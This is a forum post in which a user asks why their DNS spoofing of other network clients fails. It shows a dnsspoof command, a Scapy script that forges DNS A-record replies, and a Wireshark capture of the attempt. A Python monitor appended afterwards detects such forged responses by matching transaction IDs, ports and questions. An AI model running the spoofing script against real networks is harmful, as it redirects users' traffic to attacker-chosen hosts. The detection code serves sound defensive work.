Hello, BT
I am trying to do some DNS spoofing using dnsspoof. Simply using

does nothing, and
Code:
    dnsspoof -ieth1 udp dst port 53
only fools my host (not very useful).
I tried writing a Scapy script to do the spoofing:
Code:
    #!/usr/bin/env python
    import socket
    import scapy
    import sys
    from scapy.all import *

    SPOOF_ADDR = sys.argv[1]   # address to place in the forged A record

    while 1:
        print 'Waiting for DNS query...'
        # capture a single DNS query on the default interface
        a = sniff(filter="udp dst port 53", count=1)
        request = a[0]
        # build the reply: swap the Ethernet and IP addresses of the query,
        # default UDP header, DNS header marked as a response, one A record
        response = (Ether(src=request.dst, dst=request.src)
                    / IP(src=request.getlayer(IP).dst, dst=request.getlayer(IP).src)
                    / UDP()
                    / DNS(qr=1L, rd=1L, ra=1L,
                          an=DNSRR(rrname=request.qd.qname, type='A', rclass='IN',
                                   ttl=10, rdata=SPOOF_ADDR),
                          qd=request.qd))
        sendp(response, iface="eth1")
This doesn't work either, but I have no idea why. The spoofed packet seems almost indistinguishable from a real response (to my eyes, at least) but the clients are not fooled.
Here is a packet log taken while running my script:
Code:
    No.     Time          Source        Destination   Protocol  Info
    20414   1943.450319   X.X.117.233   X.X.2.26      DNS       Standard query A google.com

    Frame 20414: 70 bytes on wire (560 bits), 70 bytes captured (560 bits)
    Ethernet II, Src: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX), Dst: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY)
        Destination: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY)
        Source: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
        Type: IP (0x0800)
    Internet Protocol, Src: X.X.117.233 (X.X.117.233), Dst: X.X.2.26 (X.X.2.26)
    User Datagram Protocol, Src Port: 33250 (33250), Dst Port: domain (53)
    Domain Name System (query)
        [Response In: 20449]
        Transaction ID: 0x4c6c
        Flags: 0x0100 (Standard query)
        Questions: 1
        Answer RRs: 0
        Authority RRs: 0
        Additional RRs: 0
        Queries
            google.com: type A, class IN
                Name: google.com
                Type: A (Host address)
                Class: IN (0x0001)

    No.     Time          Source        Destination   Protocol  Info
    20416   1943.477886   X.X.2.26      X.X.117.233   DNS       Standard query response A X.X.117.233

    Frame 20416: 96 bytes on wire (768 bits), 96 bytes captured (768 bits)
    Ethernet II, Src: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY), Dst: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
        Destination: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
        Source: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY)
        Type: IP (0x0800)
    Internet Protocol, Src: X.X.2.26 (X.X.2.26), Dst: X.X.117.233 (X.X.117.233)
    User Datagram Protocol, Src Port: domain (53), Dst Port: domain (53)
    Domain Name System (response)
        Transaction ID: 0x0000
        Flags: 0x8180 (Standard query response, No error)
        Questions: 1
        Answer RRs: 1
        Authority RRs: 0
        Additional RRs: 0
        Queries
            google.com: type A, class IN
                Name: google.com
                Type: A (Host address)
                Class: IN (0x0001)
        Answers
            google.com: type A, class IN, addr X.X.117.233
                Name: google.com
                Type: A (Host address)
                Class: IN (0x0001)
                Time to live: 10 seconds
                Data length: 4
                Addr: X.X.117.233 (X.X.117.233)

    No.     Time          Source        Destination   Protocol  Info
    20449   1943.833154   X.X.2.26      X.X.117.233   DNS       Standard query response A 74.125.67.103 A 74.125.67.104 A 74.125.67.105 A 74.125.67.106 A 74.125.67.147 A 74.125.67.99

    Frame 20449: 166 bytes on wire (1328 bits), 166 bytes captured (1328 bits)
    Ethernet II, Src: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY), Dst: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
        Destination: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
        Source: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY)
        Type: IP (0x0800)
    Internet Protocol, Src: X.X.2.26 (X.X.2.26), Dst: X.X.117.233 (X.X.117.233)
    User Datagram Protocol, Src Port: domain (53), Dst Port: 33250 (33250)
    Domain Name System (response)
        [Request In: 20414]
        [Time: 0.382835000 seconds]
        Transaction ID: 0x4c6c
        Flags: 0x8180 (Standard query response, No error)
        Questions: 1
        Answer RRs: 6
        Authority RRs: 0
        Additional RRs: 0
        Queries
            google.com: type A, class IN
                Name: google.com
                Type: A (Host address)
                Class: IN (0x0001)
        Answers
            google.com: type A, class IN, addr 74.125.67.103
                Name: google.com
                Type: A (Host address)
                Class: IN (0x0001)
                Time to live: 1 minute, 24 seconds
                Data length: 4
                Addr: 74.125.67.103 (74.125.67.103)
            google.com: type A, class IN, addr 74.125.67.104
                Name: google.com
                Type: A (Host address)
                Class: IN (0x0001)
                Time to live: 1 minute, 24 seconds
                Data length: 4
                Addr: 74.125.67.104 (74.125.67.104)
            google.com: type A, class IN, addr 74.125.67.105
                Name: google.com
                Type: A (Host address)
                Class: IN (0x0001)
                Time to live: 1 minute, 24 seconds
                Data length: 4
                Addr: 74.125.67.105 (74.125.67.105)
            google.com: type A, class IN, addr 74.125.67.106
                Name: google.com
                Type: A (Host address)
                Class: IN (0x0001)
                Time to live: 1 minute, 24 seconds
                Data length: 4
                Addr: 74.125.67.106 (74.125.67.106)
            google.com: type A, class IN, addr 74.125.67.147
                Name: google.com
                Type: A (Host address)
                Class: IN (0x0001)
                Time to live: 1 minute, 24 seconds
                Data length: 4
                Addr: 74.125.67.147 (74.125.67.147)
            google.com: type A, class IN, addr 74.125.67.99
                Name: google.com
                Type: A (Host address)
                Class: IN (0x0001)
                Time to live: 1 minute, 24 seconds
                Data length: 4
                Addr: 74.125.67.99 (74.125.67.99)
The first packet is the DNS query from my host (nslookup google.com).
The second is the spoofed response, and the third is the actual response from the NS.
Does anybody here see my mistake? I'm at a loss.
Thanks in advance,
-d1g
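From the defender's side, the capture above is a textbook trace of what a resolver or a network monitor should be matching on: a response is only acceptable if its transaction ID, destination port and question all correspond to a query that client actually has outstanding (RFC 5452), and a second answer arriving for a query that was already answered is itself worth an alert. The following monitor is an added example written for this thread, not code from the original post or from dnsspoof/Scapy. It parses the fixed DNS header and question section from raw UDP payloads and correlates responses against observed queries. The three packets it runs over are constructed to mirror the summary lines of the poster's capture (same transaction IDs and ports); the IP addresses are RFC 5737 placeholders standing in for the redacted X.X.* hosts, and `build_dns_message` exists only to produce that test data.

```python
"""Correlate DNS responses with the queries that solicited them.

Added example for this thread. Packets below are constructed from the capture's
summary lines (txid 0x4c6c from client port 33250, a response with txid 0x0000
sent to port 53, then the resolver's real response); IPs are placeholders.
"""
import struct

DNS_PORT = 53


def encode_qname(name):
    """Encode a dotted name as DNS labels (test-data helper)."""
    out = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split("."))
    return out + b"\x00"


def build_dns_message(txid, is_response, qname, ancount=0):
    """Header plus one question (type A, class IN). Answer RRs are only counted,
    not encoded, because the monitor inspects just header and question."""
    flags = 0x8180 if is_response else 0x0100
    header = struct.pack("!HHHHHH", txid, flags, 1, ancount, 0, 0)
    return header + encode_qname(qname) + struct.pack("!HH", 1, 1)


def parse_dns(payload):
    """Return (txid, qr, qname) from a DNS message; raise on truncation."""
    if len(payload) < 12:
        raise ValueError("truncated DNS header")
    txid, flags = struct.unpack("!HH", payload[:4])
    labels, off = [], 12
    while True:
        length = payload[off]
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer in question name")
        off += 1
        labels.append(payload[off:off + length].decode("ascii"))
        off += length
    return txid, (flags >> 15) & 1, ".".join(labels).lower()


class DnsResponseMonitor:
    """Flag responses no outstanding query explains (txid, client port and
    question must all match) and repeated answers to an answered query."""

    def __init__(self):
        self.outstanding = {}   # (client_ip, client_port, txid) -> qname
        self.answered = set()

    def observe(self, src_ip, sport, dst_ip, dport, payload):
        txid, qr, qname = parse_dns(payload)
        if qr == 0:
            if dport == DNS_PORT:
                self.outstanding[(src_ip, sport, txid)] = qname
            return None
        key = (dst_ip, dport, txid)
        if key in self.answered:
            return "duplicate response for %s to %s:%d (txid 0x%04x)" % (qname, dst_ip, dport, txid)
        if self.outstanding.get(key) == qname:
            del self.outstanding[key]
            self.answered.add(key)
            return None
        # No matching query. If the same client is waiting on this name, report
        # the mismatch so an analyst sees which fields disagree.
        pending = [(p, t) for (ip, p, t), q in self.outstanding.items()
                   if ip == dst_ip and q == qname]
        if pending:
            port, tid = pending[0]
            return ("unsolicited response for %s to %s:%d txid 0x%04x; client's pending "
                    "query uses port %d txid 0x%04x" % (qname, dst_ip, dport, txid, port, tid))
        return "unsolicited response for %s to %s:%d txid 0x%04x" % (qname, dst_ip, dport, txid)


CLIENT, RESOLVER = "192.0.2.233", "192.0.2.26"   # constructed placeholder addresses

CONSTRUCTED_PACKETS = [
    (CLIENT, 33250, RESOLVER, 53, build_dns_message(0x4c6c, False, "google.com")),
    (RESOLVER, 53, CLIENT, 53, build_dns_message(0x0000, True, "google.com", ancount=1)),
    (RESOLVER, 53, CLIENT, 33250, build_dns_message(0x4c6c, True, "google.com", ancount=6)),
]


def run_demo(packets=CONSTRUCTED_PACKETS):
    """Feed packets (src_ip, sport, dst_ip, dport, payload) through the monitor."""
    mon = DnsResponseMonitor()
    alerts = []
    for pkt in packets:
        alert = mon.observe(*pkt)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in run_demo():
        print("ALERT:", a)
```

Run against the constructed trace, the monitor raises exactly one alert, for the middle packet, and accepts the resolver's own answer silently. The same correlation is what a stub resolver does internally before trusting a reply, which is why a passive sensor applying it sees forged answers even when the target host discards them.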